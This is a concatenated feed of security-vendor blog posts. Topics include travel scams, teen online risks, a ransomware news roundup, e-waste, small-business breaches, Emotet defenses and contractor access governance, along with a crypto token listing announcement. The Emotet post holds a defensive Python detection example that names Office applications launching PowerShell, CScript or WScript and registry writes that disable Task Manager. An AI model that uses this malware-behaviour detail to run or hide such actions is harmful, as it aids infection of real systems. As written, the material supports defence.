Cybercriminals take advantage of the high search volumes for accommodation and deals in these popular destinations and drive unsuspecting users to their malicious websites, often using professional-looking links, pop-up ads and even text messages.

What You Can Do to Avoid Being Scammed

With the Aussie school holidays just a few weeks away, do not despair! There are definitely steps you can take to protect yourself when booking your Winter getaway. Here are my top tips:

  1. Think Before You Click

With 25% of holiday bookings occurring through email promotions and pop-up ads, it’s essential to properly research the company behind the ads before you proceed with payment. Check out reviews and travel forums to ensure it is a legitimate online travel store. And it’s always best to use a trusted online retailer with a solid reputation even if it costs a little more.

  2. Use Wi-Fi With Caution

Using unsecured Wi-Fi is a risky business when you are travelling. If you absolutely must, ensure it is secured BUT never conduct any financial or sensitive transactions when connected. Investing in a virtual private network (VPN) such as McAfee Safe Connect is the best way to ensure that your connection is secure and your data remains private.

  3. Protect Yourself

Ensuring your device has current comprehensive security protection, like McAfee Total Protection, will ensure any malicious websites will be identified when you are browsing. It will also protect your device against malware – which could come in handy if you are tricked into visiting a fraudulent site.

So, next time you come across an amazing, bargain-basement deal to Thailand, PLEASE take the time to do your homework. Is the retailer legitimate? What do the reviews say? What are the terms and conditions? And, if it isn’t looking rosy, remember, if it looks too good to be true, it probably is!

‘till next time

Alex xx

 

The post How to Book Your Next Holiday Online and NOT Get Scammed appeared first on McAfee Blogs.

[Exchange Listing] CLB Token to be listed on Bitsdaq Exchange

Bitsdaq exchange listing CLB

The Cloudbric team is excited to announce that we will be adding a new exchange listing for our CLB token!

Bitsdaq exchange is an official partner of Bittrex, which is one of the premier cryptocurrency exchanges based out of the US.

Based on Bittrex’s unique exchange technology, Bitsdaq will help provide safe and reliable cryptocurrency trading activities for users based in the APAC region.

Users can also find Cloudbric’s CLB token listed on both the Korea-based Bitsonic exchange and BitForex, which targets global users.

Bitsdaq listing details:

  • Token: CLB
  • Exchange: Bitsdaq
  • Date: June (exact date will be announced on our Telegram)

For more information regarding our CLB token and new exchange listing announcements, please join our official Telegram community channel at https://t.me/cloudbric.

_____________________________

What is Bitsdaq?

Bitsdaq is a Hong Kong-based cryptocurrency exchange built on the unique technology of its official partner, Bittrex exchange. Bitsdaq officially launched its exchange on January 29th, 2019 and currently boasts more than 2 million users with both mobile and web access for its exchange.

As an official partner of Bittrex exchange, one of the most globally recognized cryptocurrency exchanges, Bitsdaq helps expand Bittrex’s reach towards the APAC region through its unique and cutting edge technology.


Make sure to follow us on our social media platforms (LinkedIn, Twitter, and Facebook) and our recently opened Telegram Announcement Channel for the latest updates!

The post [Exchange Listing] CLB Token to be listed on Bitsdaq Exchange appeared first on Cloudbric.

5 Digital Risks to Help Your Teen Navigate this Summer

S’mores.
Sparklers.
Snow cones.
Sunburns.
Fireflies.

Remember when summer was simple? Before smartphones and social networks, there was less uploading and more unwinding; less commenting and more savoring. 

There’s a new summer now. It’s the social summer, and tweens and teens know it well. It’s those few months away from school where the pressure (and compulsion) to show up and show off online can double. On Instagram and Snapchat, it’s a 24/7 stream of bikinis, vacations, friend groups, and summer abs. On gaming platforms, there’s more connecting and competing. 

With more of summer playing out on social, there’s also more risk. And that’s where parents come in. 

While it’s unlikely you can get kids to ditch their devices for weeks or even days at a time this summer, it is possible to coach kids through the risks to restore some of the simplicity and safety to summer.

5 summer risks to coach kids through:

  1. Body image. Every day your child — male or female — faces a non-stop, digital tidal wave of pressure to be ‘as-beautiful’ or ‘as-perfect’ as their peers online. Summer can magnify body image issues for kids.
    What you can do: Talk with your kids about social media’s power to subtly distort body image. Help kids decipher the visual world around them — what’s real, what’s imagined, and what’s relevant. Keep an eye on your child’s moods, eating habits, and digital behaviors. Are comments or captions focused only on looks? If so, help your child expand his or her focus. Get serious about screen limits if you suspect too much scrolling is negatively impacting your child’s physical or emotional health.
  2. Gaming addiction. The risks connected with gaming can multiply in the summer months. Many gaming platforms serve as social networks that allow kids to talk, play, and connect with friends all day, every day, without ever leaving their rooms. With more summer gaming comes the risk of addiction, as well as gaming scams, inappropriate content, and bullying.
    What you can do: Don’t ignore the signs of excessive gaming, which include preoccupation with gaming, anger, irritation, lying to cover playing time, withdrawal and isolation, exchanging sleep for gaming. Be swift and take action. Set gaming ground rules specific to summer. Consider parental control software to help with time limits. Remember: Kids love to circumvent time limits at home by going to a friend’s house to play video games. Also, plan summer activities out of the house and away from devices.
  3. Cyberbullying. Making fun of others, threatening, name-calling, exclusion, and racial or gender discrimination are all serious issues online. With more time on their hands in the summer months, some kids can find new ways to torment others.
    What you can do: Listen in on (monitor) your child’s social media accounts (without commenting or liking). What is the tone of your child’s comments or the comments of others? Pay attention to your child’s moods, behaviors, and online friend groups. Note: Your child could be the target of cyberbullying or the cyberbully, so keep your digital eyes open and objective.
  4. Smartphone anxiety. Anxiety is a growing issue for teens that can compound in the summer months if left unchecked. A 2018 survey from the Pew Research Center reveals that 56 percent of teens feel anxious, lonely, or upset when they don’t have their cell phones.
    What you can do: Pay attention to your child’s physical and emotional health. Signs of anxiety include extreme apprehension or worry, self-doubt, sleeplessness, stomach or headache complaints, isolation, panic attacks, and excessive fear. Establish screen limits and plan phone-free outings with your child. Set aside daily one-on-one time with your child to re-connect and seek out professional help if needed.
  5. Social Conflict. More hours in the day + more social media = potential for more conflict. Digital conflict in group chats or social networks can quickly get out of hand. Being excluded, misunderstood, or criticized hurts even more when it plays out on a public, digital stage.
    What you can do: While conflict is a normal part of life and healthy friendships, it can spiral in the online space where fingers are quick to fire off responses. Offer your child your ears before your advice. Just listen. Hear them out and (if asked) help them brainstorm ways to work through the conflict. Offer options like responding well, not engaging, and handling a situation face-to-face. Avoid the temptation to jump in and referee or solve.

Summer doesn’t have to be stressful for kids, and the smartphone doesn’t have to win the majority of your child’s attention. With listening, monitoring, and timely coaching, parents can help kids avoid common digital risks and enjoy the ease and fun of summer. 

The post 5 Digital Risks to Help Your Teen Navigate this Summer appeared first on McAfee Blogs.

Cyber News Rundown: Radiohead Hit by Ransomware Hack

Reading Time: ~ 2 min.

Radiohead Refuses Ransom, Releases Stolen Tracks

The band Radiohead recently fell victim to a hack in which 18 hours of previously unreleased sessions were ransomed for $150,000. Rather than pay the ludicrous fee, the band instead opted to release the tracks through Bandcamp for a donation to charity. The unreleased sessions were stored as archived mini discs the band created during the years surrounding their third album, “OK Computer.”

US Border Protection Breached by Contractor

A subcontractor for the US Customs and Border Protection (CBP) agency is under scrutiny after it was revealed that they had illicitly transferred thousands of images of both license plates and travelers that had crossed the US/Mexico border in the last month. In doing so, the subcontractor broke several mandatory security policies written into a legal contract. While there is no sign of the images leaking onto the dark web, there is very little redress for the exposed travelers without proving actual harm.

Billions of Spam Emails Sent Everyday

The latest industry report on spam emails revealed that around 3.4 billion fake/spam emails are distributed across the globe each day. More worrisome is that the majority of these emails originate in the US and regularly target US-based industries. While many industries have improved their security measures, larger enterprises have struggled to implement strong protection for their entire staff.

Ransomware Hits Washington Food Bank

The Auburn Food Bank in the State of Washington recently fell victim to a ransomware attack that encrypted all but one of their computers, which was isolated from the internal network. Instead of paying the ransom, the nonprofit chose to wipe all computers, including their email server, and begin rebuilding from scratch. The ransomware variant has been claimed to be GlobeImposter 2.0, which requires the victim to contact the attacker to determine the ransom demanded.

Retro Game Site Breached

Account information for over 1 million users of EmuParadise, a retro gaming site that hosts all things gaming related, has been leaked. The breach, which took place in April 2018, affected 1.1 million IP and email addresses, many of which had already appeared in previous data breaches. It is still unclear how the breach actually took place, though given the use of salted MD5 hashes for storing user data, it’s clear EmuParadise could have done more to properly secure its users’ information.

The post Cyber News Rundown: Radiohead Hit by Ransomware Hack appeared first on Webroot Blog.

Weekly Update 143

Well this was a big one. The simple stuff first - I'm back in Norway running workshops and getting ready for my absolute favourite event of the year, NDC Oslo. I'm also talking about Scott's Hack Yourself First UK Tour where he'll be hitting up Manchester, London and Glasgow with public workshops. Tickets are still available at those and it'll be your last chance for a long time to do that event in the UK.

Then there's Project Svalbard. I think it'll come across in the video below, but putting a project I've poured my heart and soul into over the last 5 and half year up for sale is a massive thing for me. There are so many emotions involved at so many levels and I really wanted to try and get that across in a more personable form than what written word lends itself to. I hope I've done that, and I hope you enjoy listening to the back story of Project Svalbard. Here it is:

References

  1. Scott's public Hack Yourself First UK Tour is coming up (Manchester, London and Glasgow - get on it!)
  2. Project Svalbard (the big one - this is a long weekly update mostly about my decision to move HIBP into another organisation)
  3. Twilio is sponsoring my blog this week (learn what regulations like PSD2 mean for your business, and how Twilio can help you achieve secure, compliant transactions)

Stop Discarding Devices Frequently- It’s Risky for Mother Earth as Well As Your Cybersecurity

“Aunty, do you happen to have any waste paper at home? I need them for my Environment Day project,” chirped a bright little thing standing at my door early Sunday morning.

“I am sure I have. What is your project this year?”

“Oh! I want to emphasize ‘Reduce. Reuse. Recycle.’ by making durable paper bags that people can pack their gifts in. It will also reduce the use of plastic.”

We need more such efforts on the part of all producers, consumers and recyclers to restore the balance on earth, which we have sadly turned into a dump yard of toxic waste that is polluting our land, water and air. The matter is serious and calls for judicious purchase and use of goods.

This Environment Day, why not pledge to reduce e-waste, digital citizens?

What is e-waste?

Electronic waste or e-waste describes discarded electrical or electronic devices. Used electronics which are destined for refurbishment, reuse, resale, salvage, recycling through material recovery, or disposal are also considered e-waste.

This means that all your obsolete devices and electronic goods, whether they are lying around at home or have been thrown away in bins, make up e-waste.

Why is there a rise in e-waste?

The volume of annual e-waste is on the rise, thanks to the desire for the latest models, fueled by rising disposable income, technological progress and cheap data rates. Gone are those thrifty days when we purchased goods to last; now we want only the smartest and latest.

Consider this: The Global E-Waste Monitor, 2017, published by the United Nations University, estimated that India generates about 2 million metric tons of e-waste annually, of which almost 82% consists of personal devices!

Why are we worried about e-waste?

We want the Earth to continue being the clean, green and beautiful planet that it is, right? But the increasing amount of e-waste is a threat to the environment. If not processed properly, it can have negative effects on pollution levels and consequently on the health of all life forms. Toxicity in soil will affect soil fertility, and hence crop production. We have already witnessed the effect of plastics and toxic fumes from incinerators on birds and animal life.

How is e-waste connected to cybersecurity?

Improper disposal of devices can also pose a security risk. If you have not taken the trouble to delete all the content and reset to factory settings, then your data, including photos may fall in wrong hands and could be misused. Before you give or throw away old devices, take care to thoroughly clean content and unsync from other devices.

How to reduce e-waste?

This is your Environment Day Mantra: Reduce. Recycle. Refurbish. Reuse.

Every time you desire to replace an electronic item, ask yourself, ‘Is it really necessary to purchase it now or can it be postponed? Am I doing it to keep up with or ahead of the Joneses? What will I do with the old product?’ Such soul-searching often leads to sane decisions that you will not regret later.

With that in mind, and the following tips handy, you can become a positive contributor to keeping the environment clean.

  1. Keep your devices in top condition: The two most common devices to be found in homes across India are the computer (or laptop) and smartphone. Replace slow batteries and keep them secured. Carry out regular scans and clean-ups and install all software updates.
  2. Protect your phone from damage: Use a screen guard and phone cases to reduce chances of breakage. Your kids can choose trendy cases that will serve two purposes: protect their phones as well as encourage them to use the devices for a longer period.
  3. Battery life: Avoid overcharging the battery to extend battery life.
  4. Secure your products: Use licensed security tools to remove malware and optimize performance.

Some countries offer financial incentives to return old devices at designated collection centres. Perhaps we should start something like this to encourage people to recycle?

Things You Can Do This Environment Day:

Still not found a suitable project for Environment Day? Why not go on a collection drive of gaming devices and mobile phones that your neighbours have lying at home. You can then clean them and get in touch with a reputed NGO to channel these gaming devices to children’s homes, domestic help and others. Think about it.


Credit

https://www.greenchildmagazine.com/reduce-ewaste/

https://tcocertified.com/news/global-e-waste-reaches-record-high-says-new-un-report/

https://www.downtoearth.org.in/blog/waste/e-waste-day-82-of-india-s-e-waste-is-personal-devices-61880

The post Stop Discarding Devices Frequently- It’s Risky for Mother Earth as Well As Your Cybersecurity appeared first on McAfee Blogs.

Fifty States, Fifty Laws

The big news lately is that individual states are proposing their own privacy laws. California has the California Consumer Protection Act and now New York and Maine have also proposed laws. There has been discussion of a federal law, however it seems unlikely that any kind of landmark legislation on privacy passes through to be […]

The post Fifty States, Fifty Laws appeared first on Privacy Ref Blog.

Small and Mid-size Orgs: Take Notice of this Trend in the 2019 Verizon Data Breach Investigations Report (DBIR).

43% of breaches in 2018 involved small businesses. Hackers know you’re vulnerable and they’re acting on it.

We’re big fans of the DBIR over here, not just because we’re contributing partners and want to see our name in lights. Yes, we’re certainly guilty of initially jumping into the contributor section and searching for our logo, but after that, we devour the data. The report in itself is an easy read, and there is also a DBIR executive summary available for those that want a short overview.

At GRA Quantum, we’re experts at developing tailored security solutions for small organizations facing big threats —and the data in this year’s DBIR show that the threats facing these orgs are only growing. 43% of breaches in 2018 involved small businesses. And that makes sense, when you take the threat actors’ POV into account. Nefarious attackers know that small and mid-size businesses don’t have the cyber hygiene that’s expected of enterprise organizations. Yet, the personally identifiable information (PII) and the intellectual property of smaller organizations is just as valuable.

It’s not all bad news.

As more organizations, especially in the small and mid-size range, move to the cloud, hackers shift their focus to the cloud too. The DBIR showed an increase in hackers’ focus to cloud-based servers. Where’s the good news in this? Much of this hacking stems from stolen credentials AND can be prevented with better education amongst staff, paired with anti-phishing technology and managed security services. All affordable options for companies that don’t have hundreds or thousands of endpoints.

More good news: you can start protecting your small org today by implementing some cybersecurity best practices. We’ve developed a checklist to strengthen your cybersecurity program that can get you started. It’s more straightforward than you may anticipate, and you don’t have to be technical or in a security role to kick-off the initiative. In fact, the list was created for management in Human Resources and Finance departments. Items in the list that are easiest to implement include:

  • Enforcing a policy to require multi-factor authentication (MFA) to access all company systems
  • Creating an onboarding and offboarding policy, integrating HR and IT activities
  • Developing a third-party vendor risk management program

Start taking this proactive approach to get ahead of the threats and strengthen your security stance today.


The post Small and Mid-size Orgs: Take Notice of this Trend in the 2019 Verizon Data Breach Investigations Report (DBIR). appeared first on GRA Quantum.

Leveraging McAfee Endpoint Security to Protect Against Emotet and Other Malware

Customers often ask us how to implement the suggestions provided in our blogs and threat advisories to better protect their environments. The goal of this blog is to do just that.

By showing you how to better use our products, you’ll be able to protect against Emotet and other malware. Emotet is a Trojan downloader spread by malicious spam campaigns using JavaScript, VBScript, and Microsoft Office macro functions. It downloads additional malware and persists on the machine as a service. Emotet has been observed to download ransomware, mass-mailing worms, W32/Pinkslipbot, W32/Expiro, W32/Dridex, and banking Trojans.

NOTE: Always test changes prior to implementing them in your environment.

1. DATs and product updates

One of the most common issues seen while in Support was an outdated DAT.

2. Make sure you have at least one scheduled product update task in McAfee ePO to run daily.

3. On-Access Scan (OAS) configuration for McAfee Endpoint Security and McAfee VirusScan Enterprise

Ensure that On-Access Scan (OAS) is enabled and set to scan on read and write and that entire drives aren’t excluded from being scanned. McAfee Endpoint Security and McAfee VirusScan Enterprise allow you to configure different scan settings based on the process. You can enable “Configure different settings for High-Risk and Low-Risk processes” to improve performance and reduce the need for file/folder exclusions. See KB88205 for more information.

Be sure that Artemis/GTI is enabled and that the first scanner action is “Clean” and the second action is “Delete”.

NOTE: Setting Artemis/GTI to High or Very High should be done gradually and with testing to reduce the risk of false positives. See KB53735 for more information.

4. On-Demand Scan (ODS)

A weekly On-Demand Scan (ODS) is suggested to ensure that your systems don’t have malware or PUPs. Do not run an ODS during peak business hours, as users may complain about system performance.

5. Access Protection (AP)

While the default Access Protection (AP) rules provide decent coverage, both McAfee Endpoint Security and McAfee VirusScan Enterprise allow for the creation of user-defined rules to prevent infection and the spread of worms or viruses. Below are some pre-created ones that should be tested and enabled in your environment to provide additional protection.

Pre-Defined Rule:

  • Disabling Registry Editor and Task Manager — Certain malware may attempt to disable the Task Manager to prevent the user from terminating the malicious process. Enable this AP rule to prevent the Task Manager from being disabled.

6. Access Protection (AP) rules for virus and worm outbreaks

These rules should only be enabled during a virus outbreak and for workstations only. Implementing the last two shown below may cause issues with file servers running McAfee VirusScan Enterprise or McAfee Endpoint Security. Always test these rules before you enable them:

  • Remotely Creating Autorun Files
  • Remotely Creating or Modifying Files or Folders
  • Remotely Accessing Local Files or Folders

NOTE: Only create a separate AP policy for workstations if you wish to continue using the AP rules below. Remotely creating files between workstations is unusual behavior.

7. User-defined AP file/folder patch locations

The user-defined rule below is one common location for malware.

8. Microsoft Office malware

Most threats come through email and are often downloaders for other malware. The AP rule below is intended to prevent Microsoft Office applications from executing PowerShell. You can include CScript.exe and WScript.exe as well.
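The Access Protection rules in sections 5 and 8 are shown on the original page as screenshots. As an added example that is not McAfee product code, the following Python models their intent as detection logic over constructed endpoint events (the key=value log format, rule names and sample lines are assumptions), so a practitioner can see exactly which parent/child and registry-write combinations the rules are meant to catch:

```python
"""Added example modelling the Access Protection rule intent from sections 5
and 8 as detection logic over constructed endpoint events. This is not McAfee
product code; the log format, rule names and sample lines are assumptions."""
import re
from dataclasses import dataclass
from typing import Dict, List

# Parent applications that should never launch a script host (section 8).
OFFICE_APPS = {"winword.exe", "excel.exe", "powerpnt.exe", "outlook.exe"}
SCRIPT_HOSTS = {"powershell.exe", "cscript.exe", "wscript.exe"}
# Policy values malware sets to lock the user out of their own tools (section 5).
LOCKOUT_VALUES = {"disabletaskmgr", "disableregistrytools"}

# Constructed key=value event lines; paths are typical Windows locations only.
SAMPLE_EVENTS = r"""
type=process parent=C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE image=C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe user=alice
type=process parent=C:\Windows\explorer.exe image=C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe user=alice
type=process parent=C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXE image=C:\Windows\System32\wscript.exe user=bob
type=registry image=C:\Users\bob\AppData\Local\Temp\update.exe path=HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System\DisableTaskMgr user=bob
type=process parent=C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE image=C:\Windows\splwow64.exe user=alice
"""

# Lazy value match that stops at the next " key=" token, so values may contain spaces.
FIELD_RE = re.compile(r"(\w+)=(.+?)(?=\s+\w+=|$)")


def parse_event(line: str) -> Dict[str, str]:
    """Split one key=value line into a dict (values such as 'Program Files' keep their spaces)."""
    return {k: v for k, v in FIELD_RE.findall(line.strip())}


def leaf(path: str) -> str:
    """Last component of a Windows file path or registry path, lower-cased."""
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def rule_office_script_host(ev: Dict[str, str]) -> bool:
    """Section 8: an Office application spawning PowerShell, CScript or WScript."""
    return (ev.get("type") == "process"
            and leaf(ev.get("parent", "")) in OFFICE_APPS
            and leaf(ev.get("image", "")) in SCRIPT_HOSTS)


def rule_tool_lockout(ev: Dict[str, str]) -> bool:
    """Section 5: a write to a policy value that disables Task Manager or Registry Editor."""
    return ev.get("type") == "registry" and leaf(ev.get("path", "")) in LOCKOUT_VALUES


RULES = [("office-spawns-script-host", rule_office_script_host),
         ("disable-taskmgr-or-regedit", rule_tool_lockout)]


@dataclass
class Verdict:
    rule: str
    user: str
    detail: str


def evaluate(events_text: str) -> List[Verdict]:
    """Return one verdict per (event, matching rule); an AP rule would block at this point."""
    verdicts = []
    for line in events_text.splitlines():
        if not line.strip():
            continue
        ev = parse_event(line)
        for name, rule in RULES:
            if rule(ev):
                origin = ev.get("parent") or ev.get("path", "")
                verdicts.append(Verdict(name, ev.get("user", "?"),
                                        f"{leaf(origin)} -> {leaf(ev.get('image', ''))}"))
    return verdicts


if __name__ == "__main__":
    for v in evaluate(SAMPLE_EVENTS):
        print(f"{v.rule:28} user={v.user:6} {v.detail}")
```

Note that the last sample line (WINWORD.EXE launching splwow64.exe, the print spooler helper) is deliberately not flagged: the rule keys on the script-host child, not on Office spawning anything at all, which is what keeps false positives down.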

9. McAfee Endpoint Security firewall

Almost all organizations have a firewall at the perimeter level. Some may opt to disable the built-in firewall on workstations and servers. The McAfee Endpoint Security Firewall is more comprehensive than the Windows firewall and can be used to prevent communication to malicious IPs and domains.

10. Blocking malicious traffic with the firewall

Blocking malicious network traffic prevents new variants from being downloaded and can minimize the impact on the environment. Environments that don’t block malicious traffic as one of the first steps often take longer to clean up.

The post Leveraging McAfee Endpoint Security to Protect Against Emotet and Other Malware appeared first on McAfee Blogs.

Hack Yourself First – The UK Tour by Scott Helme


It's the Hack Yourself First UK Tour! I've been tweeting a bit about this over recent times and had meant to write about it earlier, but I've been a little busy of late. Last year, I asked good friend and fellow security person Scott Helme to help me out running my Hack Yourself First workshops. I was overwhelmed with demand and he was getting sensational reviews for the TLS workshops he was already running. Since that time, Scott has run Hack Yourself First all over the world and done an absolutely sensational job of them. So, we decided to do a bunch in the UK and make them accessible to everyone:

  1. Manchester - 27th and 28th June
  2. London - 4th and 5th July
  3. Glasgow - 18th and 19th July

Tickets for the workshops are available at £1,250 + VAT for the 2 days which includes lunch and refreshments throughout. Scott has also arranged hotel packages in each location so if you need to stay over, there's one price you can send the boss that covers everything.

And finally, there's a shiny PDF flyer that includes all the details in one document:

Hack Yourself First - The UK Tour by Scott Helme

If you're in the UK (or can get to the UK), reach out to Scott on training@scotthelme.co.uk and he'd love to get you booked in for a couple of days of Hack Yourself First.

Privacy Comes at a Price

At Apple’s World Wide Developers Conference last week, the message was all about Privacy. Apple has been more privacy-minded than other tech companies – that’s not news and it’s why I have an iPhone. They’ve introduced some interesting privacy features, such as showing location tracking, which I think is pretty cool. I don’t leave my […]

The post Privacy Comes at a Price appeared first on Privacy Ref Blog.

How to Manage Identities for Contractors, Consultants, and Other Non-Employees


For years, organizations have recognized the need to pay close attention to and manage the access that their employees have with the help of identity governance and administration solutions. More recently, organizations are also being faced with the reality that they need to apply the same level of governance to non-employees as well. According to a 2018 Opus-sponsored Ponemon study, 59 percent of companies said they have experienced a data breach caused by one of their vendors or third parties. Many of these breaches go undetected. With most organizations agreeing that third-party cybersecurity incidents are on the rise, non-employee access management is more important than ever.

Access by non-employees like contractors, vendors, students, or consultants faces additional challenges when it comes to entitlements. How does an organization ensure that a non-employee can get into the systems they need to do their job, while still enforcing enough limitations to avoid becoming a security risk? Read on to learn more about why non-employees present a unique challenge to identity and access management programs, how industries like healthcare handle managing their privileges, and best practices to find the balance between granting permissions and reducing risk.

What makes access for non-employees so challenging?

Non-employees often need to be onboarded quickly, since they may only be temporary members of the organization. Contractors or consultants, for example, need to quickly be able to log on and get to work. Organizations with no identity governance and administration (IGA) solution, or a very limited identity and access management (IAM) program, likely do not have a way to easily limit access or keep track of those with non-employee status. Oftentimes there is no “non-employee” designation in the system, or security teams lack a centralized inventory of users, allowing atypical IDs to slip through the cracks.

Even businesses with IGA solutions may end up quickly classifying consultants as employees as far as IT is concerned. Since these roles are typically not vetted as thoroughly as a full-fledged employee would be, giving them standard access may open the door to serious security issues. Providing a contractor with full employee access defies the principle of least privilege, since contractors don’t require access to nearly as many systems and applications but will be able to log into them anyway.

Additionally, non-employees may not be working in your specific infrastructure as often, making them more prone to mistakes and making full access to sensitive information or data particularly risky. Some of the largest breaches have come from stolen non-employee credentials that allowed a hacker to get in through the front door.

Finally, non-employees tend to come and go far more frequently than employees, leaving behind an unused, but still active account. These orphaned accounts are key targets for threat actors looking for a way to get inside a system without setting off any alarms. Since the owner of the account isn’t using it, it may be too late before it’s noticed that it’s being utilized for malicious purposes.

Best practices for non-employee access

Luckily, there are a few tangible ways to solve the potential challenges related to non-employee access. An organization with a solid IGA program can safeguard its infrastructure by following a few important guidelines:

  1. Have a way to identify and manage non-employees.

There are many ways to manage non-employees. For example, you could add non-employees to your HR system, segment them appropriately, and manage their contract status. If this is not possible within an organization, the right IGA solution can be configured to be the central repository for non-employee identities and have convenient methods for inputting relevant information about them as well as enforce appropriate controls to manage them more closely.

Whatever approach an organization chooses, the most important part is to regularly ensure these non-employee user accounts are correct and up to date. The work of a contract employee can often vary depending on the project. Without regular check-ins, entitlement creep and orphaned accounts may begin to occur. That is, a contractor simply gains additional access without removing privileges they no longer need, or the account is left active after the contractor has left the organization.

  2. Follow the principle of least privilege.

All identity governance and administration (IGA) programs should begin with the principle of least privilege. That is, no employee or non-employee should have more access than needed to get their job done. This is best achieved through role-based access, which provides permissions based on roles, instead of individual entitlements. Roles can easily be applied to well-managed non-employees as well as employees.

  3. Have processes in place for efficient, but accurate onboarding and offboarding.

Manual provisioning can be labor intensive and take weeks before a new employee has access to every area they’ll need. This can lead to a frustrating experience for both the employee and non-employee and will cost the organization time and money. However, sloppy onboarding for the sake of speed can lead to security risks. While offboarding does not seem as time sensitive since no one is waiting on access, it is even more important from a security perspective.
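The three guidelines above (a managed non-employee record, least privilege through roles, and timely offboarding) each reduce to a check that can be run against the identity store. The following Python is an added example, not Core Security's product code; the role model, entitlement names, account records and dates are constructed for illustration. It flags orphaned non-employee accounts, entitlement creep beyond the role, and non-employees placed in employee-only roles:

```python
"""Added example (not Core Security's product code): three IGA checks for
non-employee accounts, run over constructed HR and identity-store records.
Role names, entitlement strings, user ids and dates are assumptions."""
from dataclasses import dataclass
from datetime import date
from typing import Dict, FrozenSet, List, Optional

# Constructed role model: the entitlements each role is supposed to carry.
ROLE_ENTITLEMENTS: Dict[str, FrozenSet[str]] = {
    "physician":   frozenset({"ehr:read", "ehr:order", "scheduling", "paging"}),
    "med-student": frozenset({"ehr:read", "scheduling"}),
    "volunteer":   frozenset({"timeclock"}),
    "hr-staff":    frozenset({"hr-portal", "payroll"}),
}
# Roles whose entitlements (benefits, payroll, HR portal) belong to employees only.
EMPLOYEE_ONLY_ROLES = {"hr-staff"}


@dataclass
class Account:
    user_id: str
    kind: str                           # "employee" or "non-employee"
    role: str
    enabled: bool
    entitlements: FrozenSet[str]
    contract_end: Optional[date] = None  # None for regular employees


def orphaned_accounts(accounts: List[Account], today: date) -> List[str]:
    """Non-employee accounts still enabled after their contract end date."""
    return [a.user_id for a in accounts
            if a.kind == "non-employee" and a.enabled
            and a.contract_end is not None and a.contract_end < today]


def entitlement_creep(accounts: List[Account]) -> Dict[str, FrozenSet[str]]:
    """Entitlements an account holds beyond what its role grants."""
    creep = {}
    for a in accounts:
        excess = a.entitlements - ROLE_ENTITLEMENTS.get(a.role, frozenset())
        if excess:
            creep[a.user_id] = excess
    return creep


def misclassified(accounts: List[Account]) -> List[str]:
    """Non-employees given an employee-only role (the 'treated as staff' problem)."""
    return [a.user_id for a in accounts
            if a.kind == "non-employee" and a.role in EMPLOYEE_ONLY_ROLES]


def review(accounts: List[Account], today: date) -> Dict[str, object]:
    """One periodic entitlement review: everything a reviewer should act on."""
    return {"orphaned": orphaned_accounts(accounts, today),
            "creep": entitlement_creep(accounts),
            "misclassified": misclassified(accounts)}


# Constructed identity-store snapshot.
SAMPLE_ACCOUNTS = [
    Account("dr.lee", "non-employee", "physician", True,
            ROLE_ENTITLEMENTS["physician"] | {"hr-portal"}, date(2019, 12, 31)),
    Account("s.kim", "non-employee", "med-student", True,
            ROLE_ENTITLEMENTS["med-student"], date(2019, 5, 31)),
    Account("v.ng", "non-employee", "volunteer", True,
            ROLE_ENTITLEMENTS["volunteer"], date(2019, 6, 30)),
    Account("c.ray", "non-employee", "hr-staff", True,
            ROLE_ENTITLEMENTS["hr-staff"], date(2019, 9, 30)),
    Account("a.ali", "employee", "hr-staff", True, ROLE_ENTITLEMENTS["hr-staff"]),
    Account("j.doe", "non-employee", "med-student", False,   # already offboarded
            ROLE_ENTITLEMENTS["med-student"], date(2019, 5, 31)),
]

if __name__ == "__main__":
    for finding, value in review(SAMPLE_ACCOUNTS, date(2019, 6, 15)).items():
        print(f"{finding:14} {value}")
```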


Use Case: Non-Employees in Healthcare

Healthcare is a perfect example of an industry that needs to have a comprehensive yet flexible way of managing non-employees. It is a highly regulated industry with a significant number of non-employees. Potentially challenging use cases include the following:

Providers

Many doctors and clinicians that work in hospital systems are not actually employed by the hospitals themselves. They may be employed by a clinic or medical group that has established a partnership allowing them privileges at the hospital.

While they may not be official employees, this group needs access to many of the systems within the hospital network. Not having access to scheduling software, communication applications, alerting systems, and of course, electronic health records (EHR) can put lives at risk. It is also important to make certain that the status of a physician’s relationship with the hospital is up to date and that access is removed when it is appropriate.

However, these doctors do not require access to employee portals that provide benefit and payment information or other human resources related applications. Granularity and visibility into the access via roles is important.

Physicians are perfect examples of a non-employee who will require longer term access, but do not require full access. Best practices and role-based access would ensure that regular entitlement reviews would renew this access as needed, verifying compliance without disrupting patient care.

Volunteers

Whether it be as part of a program to interact with and assist patients, or as part of an emergency response plan, hospitals often have a need to allow volunteers to have access to their resources and patient data. Some may be long-term; others may only last a week. Some come in large groups, others volunteer on their own. Regardless, volunteers still require a certain amount of access. It may be very minimal, perhaps to sign in to track hours and verify that they’re in the building.

With volunteers, it is imperative that their access be managed to a level corresponding with the significance of data they require. Most will not have any medical certifications and should not have any access to health records. It is important to consider the definition of roles for volunteers as well as a repository that can be used to understand their precise needs in relationship with the healthcare systems. Removing even minimal access for volunteers is important when it is no longer needed.

Medical Students

Medical students provide a unique middle ground between physicians and volunteers when it comes to access. While they need access to the EHR system, they may not require the privileges that nurses and doctors are entitled to. For example, a medical student may not need to be able to put through an order for a test or send a prescription to a pharmacy.

Administrators face additional challenges because large groups of students typically start on the same day. Since the window in which they will be working at the hospital is so short, it is important for them to have all of their access needs sorted by day one. Similarly, most students have a shared end date, so offboarding must also be well organized and efficient. Automated deprovisioning is ideal in this scenario, so that orphaned accounts don’t linger for longer than necessary. Continuous review is also still necessary in case a student drops out or transfers.

Managing Everyone with Core Access Assurance Suite

The best way to manage non-employees is with a robust IGA solution that can manage non-employees in addition to standard full-time employees. Core Access Assurance Suite provides the complete context of relationships between users, access rights, resources, user activity, and compliance policies so that you can efficiently provision a user appropriately from the beginning, using roles as necessary.

Automate the process of creating and managing non-employee accounts and identities as well as their associated access rights across the enterprise. Core Access Assurance Suite also ensures immediate disablement of access rights upon termination for increased security and regulatory compliance.

From long-term employees to short term contractors, our IGA solution will streamline access control and manage risk to provide a secure environment for your organization.

Core Access Assurance Suite provides complete identity, access risk, and compliance management, easily identifying, quantifying and managing the risks associated with information access.


Want to learn more about identity governance?

